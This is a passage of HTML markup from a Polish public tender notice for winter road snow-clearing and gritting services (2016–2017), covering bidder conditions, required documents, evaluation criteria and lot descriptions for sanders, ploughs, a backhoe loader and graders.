              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/11/2016
                    data zakończenia: 15/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia obowiązuje do wszystkich Części . </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w/w warunku <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia w/w warunku <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna w/w warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje :

a)	Dla usług określonych w:
 CZĘŚCIACH 1,2,3,4,5, 
-	środek transportowy ( nośnik ) dla piaskarki P1-J pojemność załadunku  4 m i pługa jednostronnego Środek transportowy posiadać musi aktualne badania techniczne , wykonawcy zobowiązani są do załączenia najpóźniej w dniu podpisania umowy ważnych badań technicznych .
CZĘŚCI  6
-     środek transportowy ( nośnik ) dla pługa lemieszowego jednostronnego.
Środek transportowy posiadać musi aktualne badania techniczne , wykonawcy zobowiązani są do załączenia najpóźniej w dniu podpisania umowy ważnych badań technicznych
	
 CZĘŚCI  7
-	koparko  ładowarka na podwoziu kołowym o pojemności łyżki o pojemności załadunku nie mniejsza niż 1,0 m 
CZĘŚCI  8
-  równiarka do odśnieżania dróg (ulic) wyposażona w czołowy pług dwustronny
      CZĘŚCI  9 
- równiarka do odśnieżania dróg (ulic) wyposażona w czołowy pług dwustronny
CZĘŚCI  10
-  spycharka do odśnieżania dróg z silnikiem o mocy powyżej 50 kM

Wykonawcy zobowiązani są do załączenia w ofertach dowodów dysponowania poszczególnym sprawnymi jednostkami sprzętowymi .

Na każdą Część Wykonawca jest zobowiązany wykazać, że dysponuje osobnym środkiem transportowym. Środek transportowy na daną Część nie może się powtarzać.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany będzie do przedłożenia następujących oświadczeń i dokumentów:
a) wykazu urządzeń technicznych dostępnych wykonawcy w celu w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami sporządzonego według załącznika nr 6, 6a do SIWZ
b) dokumentów dotyczących podmiotu trzeciego, w celu wykazania spełniania, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu - jeżeli wykonawca polega na zasobach podmiotu trzeciego.
5.3.2 W celu wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale 4 SIWZ, Wykonawca zobowiązany będzie do przedłożenia następujących oświadczeń i dokumentów:
a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy;
b) dokumentów dotyczących podmiotu trzeciego, w celu wykazania braku istnienia wobec nich podstaw wykluczenia o których mowa w lit a)  jeżeli wykonawca polega zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy. 
5.4	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 5.3.1 a) powyżej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt.5.4 powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Terminy, o których mowa w pkt. 5.4 stosuje się odpowiednio.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a)	Formularz Ofertowy w formie oryginału  sporządzony i wypełniony według wzoru stanowiącego Załącznik Nr 7-7i do SIWZ.
b)	Oświadczenia i dokumenty, o których mowa w pkt. 5.1 SIWZ, z zastrzeżeniem, że dokument o którym mowa w pkt. 5.1.4 SIWZ jeżeli dotyczy,
c)	Pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />16.3	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie opisanym we wzorze umowy, stanowiącym załącznik nr 2  do SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 25/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>środek transportowy (nośnik) dla piaskarki P1-J ,pojemność  załadunku  4 m <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Termin Płatości </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatoności </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 10 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 98300000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>środek transportowy ( nośnik ) dla pługa lemieszowego jednostronnego.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nośnikiem dla pługa lemieszowego (jednostronnego) będzie środek transportowy :
ciągnik rolniczy o mocy silnika min. 80,00 kW z tuzem (ramieniem) przednim przystosowanym do montażu pługa lemieszowego jednostronnego 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>ładowarko  koparka  (1 szt.)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymagana jest koparko  ładowarka na podwoziu kołowym o pojemności łyżki o pojemności załadunku nie mniejsza niż 1,0 m .
Wykonawca usług w okresie zimowym zobowiązany będzie do :
a) załadunku materiałów (mieszanki piasku z solą , piasku lub soli),
b) wykonania mieszanki piasku z solą (materiały będą sukcesywnie dostarczane do 
    Obwody Drogowego)
c) hałdowanie materiałów na składowisko.
Ponadto w razie wystąpienia takiej konieczności może być wykorzystana przy załadunku śniegu nagromadzonego przy ulicach powiatowych na środki transportu, a także przy odśnieżaniu dróg . 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 90620000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>równiarka do odśnieżania dróg (ulic)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny. Świadczenie usług obejmować będzie odśnieżanie dróg w okresie wystąpienia obfitych opadów śniegu nagromadzonego przy krawędzi jezdni w kierunku rowu przydrożnego , usuwania z jezdni błota pośniegowego <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
